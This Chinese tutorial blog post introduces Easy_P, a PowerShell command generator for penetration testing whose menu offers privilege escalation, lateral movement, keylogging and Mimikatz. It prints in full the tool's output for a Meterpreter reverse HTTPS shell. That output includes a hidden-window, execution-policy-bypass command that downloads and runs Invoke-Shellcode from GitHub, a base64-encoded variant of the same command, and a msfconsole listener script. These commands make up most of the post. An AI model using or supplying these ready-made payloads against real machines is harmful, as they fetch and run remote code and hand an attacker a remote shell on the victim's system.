玖叶教程网

前端编程开发入门

2024年04月26日

Easy_P powershell 常用代码生成辅助工具

powershell功能强大,不仅仅体现在系统管理上。在日常的渗透过程中,为了规避防火墙等原因,我们需要一些powershell脚本来辅助我们完成渗透测试工作,对于不熟悉powershell脚本的来说,有一定的难度。还好有人已经想到了这一点,写了个辅助的python脚本,可以自动生成一些常用的powershell。

Easy_P github地址:https://github.com/cheetz/Easy-P.git

首先看简介

Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the users needs.

PowerShell/WMI Generator

=========================================================

___________ __________

\_ _____/____ _________.__. \______ \

| __)_\__ \ / ___< | | ______ | ___/

| \/ __ \_\___ \ \___ | /_____/ | |

/_______ (____ /____ >/ ____| |____|

\/ \/ \/ \/

Easy_P | A Powershell / WMI Command Generator.

Written by Peter Kim <Author, The Hacker Playbook>

<CEO, Secure Planet LLC>

==================================================Easy-P==

-----------------------------------------------------

[1] Privilege Escalation

[2] Lateral Movement

[3] Keylogging

[4] PowerShell Meterpreter

[5] Change Users Execution Policy

[6] Powershell 101

[7] Base64 Encode a PowerShell Script

[8] Mimikatz - Passwords from Memory

[99] Exit/Quit

-----------------------------------------------------

我们选择4,生成一个反弹的meterpreter脚本

Select An Option: 4

[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell. Original: https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1

LHOST: 192.168.1.103

LPORT: 55555

[*]Download from internet and execute:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force

[*]Run from a local copy of the script:

powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force}"

[*]Base64 encoded version download and execute:

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADEALgAxADAAMwAgAC0ATABwAG8AcgB0ACAANQA1ADQANgAgAC0ARgBvAHIAYwBlAA==

[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your Kali box and load your handler with msfconsole -r listener.rc

use multi/handler

set payload windows/meterpreter/reverse_https

set LHOST 192.168.1.103

set LPORT 55555

set ExitOnSession false

exploit -j

可以看到生成了三种格式的powershell脚本,网络下载执行,本地执行,base64编码格式,其他的功能大家可以自行研究,限于篇幅原因,不多累赘。

标签:powershell脚本 

作者:gojiuye , 分类:技术精选 , 浏览:12 , 评论:0

发表评论:

控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言